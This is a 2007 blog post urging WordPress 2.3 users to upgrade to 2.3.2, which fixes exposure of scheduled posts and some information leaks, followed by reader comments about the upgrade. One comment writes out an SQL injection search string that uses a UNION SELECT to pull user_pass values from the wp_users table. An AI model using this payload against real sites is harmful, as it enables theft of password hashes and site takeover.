
WordPress has just released an urgent security update for the 2.3 series. If you’re blog is powered by WordPress 2.3, then you should upgrade to this latest version right away. The upgrade fixes a security bug that allows people to view your timestamped posts. You may have seen a few posts around Blogsphere showing how to see what Shoemoney is going to post tomorrow. Well, once Shoe upgrades his WordPress, you won’t be able to do that anymore.

WordPress 2.3.2 also suppresses some error messages that can give away information about your database table structure, and it limits and stops some information leaks in the XML-RPC and APP implementations. There’s also a bonus feature that allows you to define a custom DB error page. See the full list of changes here.

This is not a major release, and as such it will not change your DB structure. Upgrading should be as easy as uploading and replacing the old WordPress files. That’s what I did anyway. You can see the full list of bug fixes here.

Download WordPress 2.3.2


    38 Comments

    2007-12-29 16:16:52

    WordPress Never Stop !!

    Comment by SEO Optimization
    2007-12-29 20:18:38

    Well, at least they do improve and serve us with a more secure platform rather than just ignore the bugs.

     
     
    Comment by Shaun Carter
    2007-12-29 16:41:28

    I know that if you know the URL of a post you can view it before it goes live but I didn’t know there was another way.

    I better go update now.

    Comment by mahdi yusuf
    2007-12-29 19:51:39

    Does anybody else know how? It could be cool as a little test.

     
     
    Comment by Mike Goad
    2007-12-29 16:45:22

    I noticed the time stamp issue and thought that it shouldn’t work that way, but then just dismissed it. I guess that for the A-list bloggers, it could be detrimental for others to see your post before it’s officially published.

     
    Comment by Gary R. Hess
    2007-12-29 16:53:20

    Thanks! I probably wouldn’t have updated until much later if it wasn’t for this post :grin:

     
    Comment by Nicholas James
    2007-12-29 16:56:44

    Thanks, I’ll be upgrading my blog shortly. :razz:

     
    2007-12-29 17:56:05

    Good catch and good explanation, John. Funny, I took more than an hour off to drink coffee and work down the list of un-reads in my feedreader this morning and I didn’t come across anyone else mentioning this until I got to you (saving the best ’til last ;-)).

    I highly recommend techie-buzz’s automatic update plug-in. It makes these upgrades a snap and also lets you do a backup as part of the process very painlessly. It’s available at:
    http://techie-buzz.com/wordpress-plugins/wordpress-automatic-upgrade-plugin.html
    for those who hate manual piece by piece updating.

    Comment by Inspired Epiphany
    2007-12-29 18:46:44

    Thanks for the info John… and thanks for the link to the Wordpress plugin Dave, it’s gonna make updating all my blogs that much faster! :smile:

     
     
    Comment by Shirvo Jones
    2007-12-29 18:00:06

    Good work Mr Chow. I just read it here first! The automatic updater you turned me on to works a treat as well. Cheers! :razz:

     
    Comment by vhxn.com
    2007-12-29 18:27:26

    Yes, I saw on my blog Dashboard about the New Version Update. I didn’t update yet, I wanna do this soon :roll:

     
    Comment by Mike Huang
    2007-12-29 18:35:59

    Darn! If only I knew about this earlier, so I could have sneaked into posts ;)

    -Mike

     
    Comment by Blogging Beat
    2007-12-29 18:44:22

    Dam, I’ve like 6 blogs that will need updating. Thanks for the heads up.

    Comment by vangardx
    2007-12-29 19:23:31

    use the plugin..it will be easier and fun :D

     
     
    Comment by Richard Bizick
    2007-12-29 19:23:02

    no one can read my timestamped posts :smile:

     
    Comment by mahdi yusuf
    2007-12-29 19:49:52

    goooooo wordpress!

     
    Comment by Joy
    2007-12-29 20:20:25

    Thanks a lot for the heads up!

     
    Comment by David Chew
    2007-12-29 20:34:59

    For people who want to have a full secure on his work or personal detail, upgrading would be a good idea. Thanks for showing us John.

     
    Comment by Contest Beat
    2007-12-29 20:50:11

    Thanks for the heads up

     
    Comment by ImageGag
    2007-12-29 21:01:43

    Newbie question. I’ve never done this before. Will I lose all of the tweaks, such as custom header, installed widgets, and other stuff that I’ve done?

    If so, is there an easy way to get everything back? I just don’t want to end up back at the basic Kubrick design. Thanks a lot.

    Comment by seo audit
    2007-12-30 00:57:37

    No, you will not lose those. Make a backup anyway before upgrading.

    Comment by ImageGag
    2007-12-30 12:01:05

    Will do. Thank you.

     
     
     
    Comment by Steve!
    2007-12-30 00:29:11

    I’m still updating. Heck, I never knew you could see what Shoe was posting, before he posted it.

     
    Comment by seo audit
    2007-12-30 00:56:38

    Thx for the tip.

     
    Comment by Etienne Teo
    2007-12-30 01:08:05

    Wordpress just continues to update and give the best to its users.

     
    2007-12-30 01:28:06

    Wordpress theme viewer back! Finally!

    Yay! The Wordpress theme viewer site is finally back probably following the Wordpress upgrade to 2.2.3.
    This has been something I’ve been tense about for a while as I was looking for a new theme, but couldn’t find one. Once again, I’m…

     
    Comment by Simon
    2007-12-30 02:28:58

    Thanks for the heads up on this John.

     
    Trackback by Simon Lau
    2007-12-30 02:31:25

    Wordpress 2.3.2 Upgrade

    Wordpress has released an urgent security release that can expose draft posts.  If you’re using 2.3.1, you should immediately do an upgrade.  The process took me about 5 minutes, most of which was making a backup of the server, deleting the nec…

     
    2007-12-30 03:13:18

    Thank you for the info about the update. Security is the first. :)

     
    2007-12-30 14:39:35

    [...] Chow at John Chow dot com reminds bloggers that Wordpress 2.3.2 is available for download. I have to get on this right away. Remember: if John Chow tells you to do something on your blog . . [...]

     
    Comment by Nullamatix
    2007-12-30 17:37:00

    After the upgrade several of my plug-ins stopped working. Specifically, Brian’s Threaded Comments, and WP-Cache. Anyone else running into this? My comments look terrible now.

     
    Comment by Dean Saliba
    2007-12-30 19:49:58

    I know what I did find, my theme no longer displays correctly, I had to go back to 2.3.1 to get it to work properly again.

     
    Comment by krazl
    2007-12-30 21:05:15

    Here technical reason documentation.
    === WordPress Charset SQL Injection Vulnerability ===
    exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23

     
    2007-12-30 21:51:50

    I don’t know if I’m going to upgrade right away or not. Decisions, decisions.

     
    Comment by BlackHatDomainer
    2007-12-30 23:06:26

    Thanks for reporting it, John. My blog jumped from 50 to 200 subscribers today. ;)

     
    Comment by MoneyNing
    2007-12-31 09:36:18

    For many, they’d rather people read their timestamped posts since it gives them one more visitor :twisted:

     
    2008-01-04 14:09:35

    [...] actually heard about the update over at John’s site before I logged into my Admin, so I managed to read through the comments, when I came across a much [...]

     
    Comment by
    2008-01-06 01:54:27

    “If you’re blog is powered by WordPress”

    No, I am not a blog.

     
